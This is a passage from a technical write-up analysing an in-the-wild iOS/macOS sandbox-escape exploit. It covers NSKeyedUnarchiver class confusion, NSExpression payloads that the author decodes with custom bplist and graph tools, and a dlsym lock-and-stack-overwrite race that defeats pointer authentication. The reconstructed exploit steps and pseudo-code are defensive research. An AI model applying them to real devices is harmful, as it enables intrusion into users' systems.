
  NSType type;

  if (!decoder.decode(type))

    return std::nullopt;

In this case, rather than knowing the type to decode upfront they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:

switch (type) {

  case NSType::Array:

    return decodeArrayInternal(decoder, allowedClasses);

  case NSType::Color:

    return decodeColorInternal(decoder);

  case NSType::Dictionary:

    return decodeDictionaryInternal(decoder, allowedClasses);

  case NSType::Font:

    return decodeFontInternal(decoder);

  case NSType::Number:

    return decodeNumberInternal(decoder);

  case NSType::SecureCoding:

    return decodeSecureCodingInternal(decoder, allowedClasses);

  case NSType::String:

    return decodeStringInternal(decoder);

  case NSType::Date:

    return decodeDateInternal(decoder);

  case NSType::Data:

    return decodeDataInternal(decoder);

  case NSType::URL:

    return decodeURLInternal(decoder);

  case NSType::CF:

    return decodeCFInternal(decoder);

  case NSType::Unknown:

    break;

}


In this case they choose type 7, which corresponds to NSType::SecureCoding and is decoded by calling decodeSecureCodingInternal, which allocates an NSKeyedUnarchiver initialized with data from the IPC message:

auto unarchiver =

  adoptNS([[NSKeyedUnarchiver alloc]

           initForReadingFromData:

             bridge_cast(data.get()) error:nullptr]);

The code adds a few more classes to the allow-list to be decoded:

auto allowedClassSet =

  adoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);

[allowedClassSet addObject:WKSecureCodingURLWrapper.class];

[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];

if ([allowedClasses containsObject:NSAttributedString.class]) {

  [allowedClassSet

    unionSet:NSAttributedString.allowedSecureCodingClasses];

}

then unarchives the object:

id result =

  [unarchiver decodeObjectOfClasses:

                allowedClassSet.get()

              forKey:

                NSKeyedArchiveRootObjectKey];
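As an aside, here's a minimal sketch of how this class allow-list mechanism looks through the public API - nothing WebKit-specific, purely to illustrate the decodeObjectOfClasses:forKey: semantics:

#import <Foundation/Foundation.h>

int main(void) {
  @autoreleasepool {
    NSError *err = nil;
    NSData *data =
      [NSKeyedArchiver archivedDataWithRootObject:@{@"key" : @42}
                            requiringSecureCoding:YES
                                            error:&err];

    // Decoding succeeds only if the root object's class (and the classes
    // of everything it transitively decodes) are in the allowed set:
    NSSet *allowed = [NSSet setWithObjects:NSDictionary.class,
                                           NSString.class,
                                           NSNumber.class, nil];
    id obj = [NSKeyedUnarchiver unarchivedObjectOfClasses:allowed
                                                 fromData:data
                                                    error:&err];
    NSLog(@"%@", obj); // { key = 42; }
  }
  return 0;
}

The key subtlety exploited here is that each class's initWithCoder: runs with its own view of the allow-list - as we're about to see, a decoded object can pull further classes into scope for its sub-decodes.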

The serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:

- (instancetype)initWithCoder:(NSCoder *)coder

{

  auto selfPtr = adoptNS([super initWithString:@""]);

  if (!selfPtr)

    return nil;

  BOOL hasBaseURL;

  [coder decodeValueOfObjCType:"c"

         at:&hasBaseURL

         size:sizeof(hasBaseURL)];

  RetainPtr<NSURL> baseURL;

  if (hasBaseURL)

    baseURL =

     (NSURL *)[coder decodeObjectOfClass:NSURL.class

                     forKey:baseURLKey];

...

}

This in turn decodes an NSURL, which decodes an NSString member named "NS.relative". The attackers pass a subclass of NSString, _NSLocalizedString, whose deserialization sets up the following allow-list:

  v10 = objc_opt_class_385(&OBJC_CLASS___NSDictionary);

  v11 = objc_opt_class_385(&OBJC_CLASS___NSArray);

  v12 = objc_opt_class_385(&OBJC_CLASS___NSNumber);

  v13 = objc_opt_class_385(&OBJC_CLASS___NSString);

  v14 = objc_opt_class_385(&OBJC_CLASS___NSDate);

  v15 = objc_opt_class_385(&OBJC_CLASS___NSData);

  v17 = objc_msgSend_setWithObjects__0(&OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);

  v20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR("NS.configDict"));

They then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):

-[NSSharedKeyDictionary initWithCoder:]

...

v6 = objc_opt_class_388(&OBJC_CLASS___NSSharedKeySet);

...

 v11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR("NS.skkeyset"));

NSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.

But recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! Which means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in ForcedEntry of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!


Part II - Data Is All You Need

NSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:

NSPredicateOperator_

NSRightExpression_

NSLeftExpression

NSComparisonPredicate[NSPredicate

^NSSelectorNameYNSOperand[NSArguments

NSFunctionExpression\NSExpression

NSConstantValue

NSConstantValueExpressionTself

\NSCollection

NSAggregateExpression

There are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:

syscallInvocation

manipulating locks:

os_unfair_unlock_0x34

%os_unfair_lock_0x34InvocationInstance

spinning up threads:

.detachNewThreadWithBlock:_NSFunctionExpression

detachNewThreadWithBlock:

!NSThread_detachNewThreadWithBlock

XNSThread

3NSThread_detachNewThreadWithBlockInvocationInstance

6NSThread_detachNewThreadWithBlockInvocationInstanceIMP

pthreadinvocation

pthread____converted

yWpthread

pthread_nextinvocation

pthread_next____converted

and sending and receiving mach messages:

mach_msg_sendInvocation

mach_msg_receive____converted

 mach_make_memory_entryInvocation

mach_make_memory_entry

#mach_make_memory_entryInvocationIMP

as well as interacting with IOKit:

IOServiceMatchingInvocation

IOServiceMatching

IOServiceMatchingInvocationIMP

In addition to these strings there are also three fairly large chunks of javascript source which look rather suspicious:

var change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var scribble_element=[.1];

...

Starting up

Last time I analysed one of these I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:

$ plutil -p bplist_raw | wc -l

   58995

Here's a random snippet a few tens of thousands of lines in:

14319 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]>

      {value = 29}

  "NSConstantValue" =>

    <CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]>

      {value = 14320}

}

14320 => 2

14321 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]>

      {value = 27}

  "NSArguments" =>

    <CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]>

      {value = 14323}

  "NSOperand" =>

    <CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]>

      {value = 14319}

  "NSSelectorName" =>

    <CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]>

      {value = 14322}

There are a few possible analysis approaches here: I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places) but I didn't want to just learn what this serialized object does - I wanted to know how it works.

Another option would be parsing the output of plutil but I figured this was likely almost as much work as parsing the bplist from scratch so I decided to just write my own bplist and NSArchiver parser and go from there.

This might seem like overdoing it, but with such a huge object it was likely I was going to need to be in the position to manipulate the object quite a lot to figure out how it actually worked.

bplist

Fortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.

This blog post gives a great overview of the format and also links to the CoreFoundation .c file containing a comment defining the format.

A bplist serialized object has 4 sections:

  • header
  • objects
  • offsets
  • trailer

The objects section contains all the serialized objects one after the other. The offsets table contains indexes into the objects section for each object. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.

bplist only supports a small number of built-in types:

null, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary

The serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:

Object Formats (marker byte followed by additional info in some cases)

null   0000 0000

bool   0000 1000           // false

bool   0000 1001           // true

fill   0000 1111           // fill byte

int    0001 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

real   0010 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

date   0011 0011 ...       // 8 byte float follows, big-endian bytes

data   0100 nnnn [int] ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes

string 0101 nnnn [int] ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes

string 0110 nnnn [int] ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t

       0111 xxxx           // unused

uid    1000 nnnn ...       // nnnn+1 is # of bytes

       1001 xxxx           // unused

array  1010 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

       1011 xxxx                       // unused

set    1100 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

dict   1101 nnnn [int] keyref* objref* // nnnn is count, unless '1111', then int count follows

       1110 xxxx // unused

       1111 xxxx // unused

It's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist trailer defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)
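To make that concrete, here's a minimal C sketch of the trailer and offset-table plumbing (field layout per the CFBinaryPlistTrailer struct in CFBinaryPlist.c; error handling omitted):

#include <stddef.h>
#include <stdint.h>

// The fixed 32-byte trailer at the end of every bplist:
struct bplist_trailer {
  uint8_t  unused[5];
  uint8_t  sort_version;
  uint8_t  offset_int_size;      // bytes per offset-table entry
  uint8_t  object_ref_size;      // bytes per keyref/objref
  uint64_t num_objects;          // these three are big-endian on disk
  uint64_t top_object;
  uint64_t offset_table_offset;
};

static uint64_t read_be(const uint8_t *p, int n) {
  uint64_t v = 0;
  while (n--) v = (v << 8) | *p++;
  return v;
}

// Returns the file offset of object number idx in the bplist in buf:
static uint64_t object_offset(const uint8_t *buf, size_t len, uint64_t idx) {
  const uint8_t *trailer = buf + len - 32;
  uint8_t  entry_size = trailer[6];               // offset_int_size
  uint64_t table      = read_be(trailer + 24, 8); // offset_table_offset
  return read_be(buf + table + idx * entry_size, entry_size);
}

From there the parser just decodes the TLV object at each offset, recursing through keyref/objref indexes for the compound types.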

Parsing the bplist and printing it ends up with an object with this format:

dict {

  ascii("$top"):

    dict {

      ascii("root"):

        uid(0x1)

    }

  ascii("$version"):

    int(0x186a0)

  ascii("$objects"):

    array [

      [+0]:

        ascii("$null")

      [+1]:

        dict {

          ascii("NS.relative"):

            uid(0x3)

          ascii("WK.baseURL"):

            uid(0x3)

          ascii("$0"):

            int(0xe)

          ascii("$class"):

            uid(0x2)

        }

      [+2]:

        dict {

          ascii("$classes"):

            array [

              [+0]:

                ascii("WKSecureCodingURLWrapper")

              [+1]:

                ascii("NSURL")

              [+2]:

                ascii("NSObject")

            ]

          ascii("$classname"):

            ascii("WKSecureCodingURLWrapper")

        }

...

The top level object in this bplist is a dictionary with three entries:

$version: int(100000)

$top: uid(1)

$objects: an array of dictionaries

This is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)

The $top dictionary has a single key "root" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.

Each object encoded within the NSKeyedArchiver effectively consists of two dictionaries:

one defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:

{

  NS.relative : uid(0x3)

  WK.baseURL :  uid(0x3)

  $0 :          int(0xe)

  $class :      uid(0x2)

}

The $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:

{

  $classname : "WKSecureCodingURLWrapper"

  $classes   : ["WKSecureCodingURLWrapper",

                "NSURL",

                "NSObject"]

}

Note that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.

It shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.

Finding the beginning

Since we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions. In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:

sections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])

Each of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.

Types

There are only a handful of primitive NSExpression family objects from which the graph is built (a short sketch of how they compose follows this list):

NSComparisonPredicate

  NSLeftExpression

  NSRightExpression

  NSPredicateOperator

Evaluate the left and right side then return the result of comparing them with the given operator.

NSFunctionExpression

  NSSelectorName

  NSArguments

  NSOperand

Send the provided selector to the operand object passing the provided arguments, returning the return value

NSConstantValueExpression

  NSConstantValueClassName

  NSConstantValue

A constant value or Class object

NSVariableAssignmentExpression

  NSAssignmentVariable

  NSSubexpression

Evaluate the NSSubexpression and assign its value to the named variable

NSVariableExpression

  NSVariable

Return the value of the named variable

NSCustomPredicateOperator

  NSSelectorName

The name of a selector to invoke as a comparison operator

NSTernaryExpression

  NSPredicate

  NSTrueExpression

  NSFalseExpression

Evaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.
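As promised, here's a minimal sketch of how these primitives compose, using the public NSExpression API (recent OS hardening restricts some of this during unarchiving, but direct construction still shows the semantics):

#import <Foundation/Foundation.h>

int main(void) {
  @autoreleasepool {
    // NSConstantValueExpression:
    NSExpression *operand =
      [NSExpression expressionForConstantValue:@"hello"];

    // NSFunctionExpression: send -uppercaseString to the operand:
    NSExpression *call =
      [NSExpression expressionForFunction:operand
                             selectorName:@"uppercaseString"
                                arguments:@[]];

    // NSVariableExpressions read and write named slots in this dictionary:
    NSMutableDictionary *context = [NSMutableDictionary dictionary];
    NSLog(@"%@", [call expressionValueWithObject:nil context:context]); // HELLO
  }
  return 0;
}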

E2BIG

The problem is that the object graph is simply enormous, with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly became incomprehensible, with over 40 layers of nesting.

It's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.

Going DOTty

This object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?

DOT is the graph description language used by graphviz - an open-source graph drawing package. It's pretty simple:

digraph {

 A -> B

 B -> C

 C -> A

}

Diagram showing a three-node DOT graph with a cycle from A to B to C to A.

You can also define nodes and edges separately and apply properties to them:

digraph {

A [shape=square]

B [label="foo"]

 A -> B

 B -> C

 C -> A [style=dotted]

}

A simple 3 node diagram showing different DOT node and edge styles

With the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...

After leaving it overnight without success it seemed that perhaps a different approach was required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which is likely failing is graphviz's attempt to lay out the nodes in a clean way.

Medium data

Maybe some of the tools explicitly designed for interactively exploring significant datasets could help here. I chose to use Gephi, an open-source graph visualization platform.

I loaded the .dot file into Gephi and waited for the magic:

A screenshot of Gephi showing a graph with thousands of overlapping nodes rendered into an almost solid square of indistinguishable circles and arrows

This might take some more work.

Directing forces

The default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:

Screenshot of Gephi showing a large complex graph where the nodes are distinguishable and there is some clustering

Much better! I then started to investigate which nodes have large in- or out-degrees and to figure out why. For example, here we can see that a node with the label func:alloc has a huge in-degree.

Screenshot of Gephi showing the func:alloc node with a very large number of incoming graph edges

Trying to lay out the graph with nodes with such high in-degrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much) so I started adding hacks to the custom parser to duplicate certain nodes, while maintaining the semantics of the expression, in order to minimize the number of crossing edges in the graph.

During this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:

A graph rendering of the sandbox escape NSExpression payload node graph, with an eerie similarity to a human eye

Flattening

Although this created a large number of extra nodes in the graph, it turns out that this made things much easier for graphviz to lay out. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels - for example, using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:

Diagram showing an NSExpression subgraph performing a bitwise operation and using variables

Here we can see nested, related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-Objective-C:

[writeInvocationName

  getArgument:

    [ [_NSPredicateUtils

        bitwiseOr: [NSNumber numberWithUnsignedLongLong:

                              [intermediateAddress: bytes]]

        with: @0x8000000000000000]] longLongValue ]

  atIndex: [@0x1 longLongValue] ]

We can also now clearly see the trick they use to execute multiple unrelated statements:

Diagram showing a graph of NSNull alloc nodes tying unrelated statements together

Multiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side effects (NSNull is a singleton, so alloc just returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments, then discard them.

They build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.

Diagram showing nodes and edges in a tree of NSNull alloc NSFunctionExpressions
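A sketch of how one of these sequencing nodes could be built with the public API (stmt1, stmt2 and stmt3 stand for arbitrary NSExpression statements; illustrative only):

NSExpression *nullClass =
  [NSExpression expressionForConstantValue:[NSNull class]];
NSExpression *seq =
  [NSExpression expressionForFunction:nullClass
                         selectorName:@"alloc"
                            arguments:@[stmt1, stmt2, stmt3]];
// Evaluating seq evaluates stmt1, stmt2 and stmt3 in order, then
// discards all three results.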

Connecting the dots

Since the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst the Mach-O binary is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.

bplist_to_objc

Having figured out the NSNull trick they use for sequential expression evaluation it's now possible to flatten the graph to pseudo-Objective-C code, splitting each argument to an [NSNull alloc] NSFunctionExpression into a separate statement:

id v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@"target" selectorName:@"detachNewThreadWithBlock:" arguments:@[] ] selector] ];

This is getting closer to a decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.

Helping out

The expressions make use of NSPredicateUtilities for arithmetic and bitwise operations. Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:

      if selector_str == 'bitwiseOr:with:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)

      elif selector_str == 'add:to:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))

This yields arithmetic statements which look like this:

[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];

but...why?

After all that we're left with around 1000 lines of sort-of readable pseudo-Objective-C. There are a number of further tricks they use to implement things like arbitrary read and write, which I manually replaced with simple assignment statements.

The attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.

The major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. return addresses on the stack) were always per-process but the A-family keys (used for forward-edge protection for things like function pointers) used to be shared across all userspace processes, meaning userspace tasks could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.

With some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge keys for other tasks (like the GPU Process.)

Most previous userspace PAC defeats involved finding a way for a forged forward-edge function pointer to be used across a privilege boundary - and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel PAC defeats here...

Invoking Invocations with IMPs

An NSInvocation, as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't "call methods" but instead "pass messages to objects" in reality of course you do end up eventually at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP object (it's really just a function pointer.)

As outlined in the see-no-eval NSExpression blogpost, NSInvocations can be used to get instruction pointer control from NSExpressions - with the caveat that you must provide a signed PC value. The first method they call using this primitive is the implementation of [CFPrefsSource lock]:

; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)

ADD  X0, X0, #0x34

B    _os_unfair_lock_lock

They get a signed (with PACIZA) IMP for this function by calling

id os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]

To call that function they use two nested NSInvocations:

id invocationInner = [templateInvocation copy];

[invocationInner setTarget:(dlsym_lock_ptr - 0x34)]

[invocationInner setSelector: [@0x43434343 longLongValue]]

id invocationOuter = [templateInvocation copy];

[invocationOuter setSelector: sel(invokeUsingIMP)];

[invocationOuter setArgument: os_unfair_lock_0x34_IMP

                   atIndex: @2];

They then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP:. This allows the [CFPrefsSource lock] function implementation to be called on something which most certainly isn't a CFPrefsSource object (as invokeUsingIMP: bypasses the regular Objective-C selector-to-IMP lookup process.)
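Reassembled as a sketch (the variable names follow the exploit's pseudo-code; templateInvocation is assumed to be an NSInvocation with a suitable method signature, and invokeUsingIMP: is private API):

// Assumed inputs:
//   NSInvocation *templateInvocation; // invocation with a usable signature
//   uintptr_t     dlsym_lock_ptr;     // address of the lock to take
//   IMP           lockIMP;            // PACIZA-signed -[CFPrefsSource lock]
NSInvocation *inner = [templateInvocation copy];
[inner setTarget:(__bridge id)(void *)(dlsym_lock_ptr - 0x34)]; // becomes X0
[inner setSelector:(SEL)(uintptr_t)0x43434343]; // dummy; never looked up

NSInvocation *outer = [templateInvocation copy];
[outer setTarget:inner];
[outer setSelector:NSSelectorFromString(@"invokeUsingIMP:")];
[outer setArgument:&lockIMP atIndex:2];

// invokeUsingIMP: branches straight to the supplied IMP with the inner
// invocation's target and arguments, so -[CFPrefsSource lock] runs with
// X0 = dlsym_lock_ptr - 0x34 and locks the chosen word.
[outer invoke];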

Lock what?

But what is that lock, and why are they locking it? That lock is used here inside dlsym:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

__block Diagnostics diag;

__block Loader::ResolvedSymbol result;

if ( handle == RTLD_DEFAULT ) {

  // magic "search all in load order" handle

  __block bool found = false;

  withLoadersReadLock(^{

    for ( const dyld4::Loader* image : loaded ) {

      if ( !image->hiddenFromFlat() && image->hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &result) ) {

        found = true;

        break;

      }

    }

  });

withLoadersReadLock first takes the global lock (the one the invocation just locked) before evaluating the block which resolves the symbol:

this->libSystemHelpers->os_unfair_recursive_lock_lock_with_options(

  &(_locks.loadersLock),

  OS_UNFAIR_LOCK_NONE);

work();

this->libSystemHelpers->os_unfair_recursive_lock_unlock(

  &_locks.loadersLock);

So by taking this lock the NSExpression has ensured that any call to dlsym in the GPU process will block, waiting for the lock to be released.

Threading the needle

Next they use the same double-invocation trick to make the following Objective-C call:

[NSThread detachNewThreadWithBlock:aBlock]

passing as the block argument a pointer to a block inside the CoreGraphics library with the following body:

void *__CGImageCreateWithPNGDataProvider_block_invoke_2()

{

  void *sym;

  if ( CGLibraryLoadImageIODYLD_once != -1 ) {

    dispatch_once(&CGLibraryLoadImageIODYLD_once,

                  &__block_literal_global_5_15015);

  }

  if ( !CGLibraryLoadImageIODYLD_handle ) {

    // fail

  }

  sym = dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

  if ( !sym ) {

    // fail

  }

  CGImageCreateWithPNGDataProvider = sym;

  return sym;

}

Prior to starting the thread calling that block they also perform two arbitrary writes to set:

CGLibraryLoadImageIODYLD_once = -1

and

CGLibraryLoadImageIODYLD_handle = RTLD_DEFAULT

This means that the thread running that block will reach the call to:

dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

then block inside the implementation of dlsym waiting to take a lock held by the NSExpression.

Sleep and repeat

They call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)

They then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.

They use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:

id v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];

Recall this code we saw earlier in the dlsym snippet:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

BLOCK_ACCCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:

[v_stackData rangeOfData:@"b'_CGImageSourceGetType'" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]

This returns an NSRange object defining where the string "_CGImageSourceGetType" appears in that page of the stack.  "CGImageSourceGetType" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.

The NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string "_dlsym\0\0" over the start of the  "_CGImageSourceGetType" string on the blocked dlsym thread.

Unlock and go

Using the same tricks as before (but this time using the IMP of [CFPrefsSource unlock]) they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.

The block then assigns the return value of that call to dlsym to a global variable:

  CGImageCreateWithPNGDataProvider = sym;

The NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!

(It's worth noting that it used to be the case, as documented by Samuel Groß in his iMessage remote exploit writeup, that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)

Do look up

Armed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:

#define f_def(v_index, sym) \\

  id v_#sym#Invocation = [v_templateInvocation copy];

  [v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];

  [v_#sym#Invocation setSelector:[@"sym" UTF8String] ];

  id v_#sym#InvocationIMP = [v_templateInvocation copy];

  [v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];

  [v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];

  [v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];

  [v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];

  [v_#sym#InvocationIMP setTarget:v_symInvocation ];

  [v_#sym#InvocationIMP invoke];

  id v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];

  [v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];

  id v_#sym# = v_#sym#____converted;

  id v_#index = v_#sym;

}

f_def(0, syscall)

f_def(1, task_self_trap)

f_def(2, task_get_special_port)

f_def(3, mach_port_allocate)

f_def(4, sleep)

f_def(5, mach_absolute_time)

f_def(6, mach_msg)

f_def(7, mach_msg2_trap)

f_def(8, mach_msg_send)

f_def(9, mach_msg_receive)

f_def(10, mach_make_memory_entry)

f_def(11, mach_port_type)

f_def(12, IOMainPort)

f_def(13, IOServiceMatching)

f_def(14, IOServiceGetMatchingService)

f_def(15, IOServiceOpen)

f_def(16, IOConnectCallMethod)

f_def(17, open)

f_def(18, sprintf)

f_def(19, printf)

f_def(20, OSSpinLockLock)

f_def(21, objc_msgSend)

Another path

Still not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:

id v_JSContext = [[JSContext alloc] init];

[v_JSContext evaluateScript:@"function hex(b){return(\"0\"+b.toString(16)).substr(-2)}function hexlify(bytes){var res=[];for(var i=0..." ];

...

The exploit evaluates three separate scripts inside this same context:

JS 1

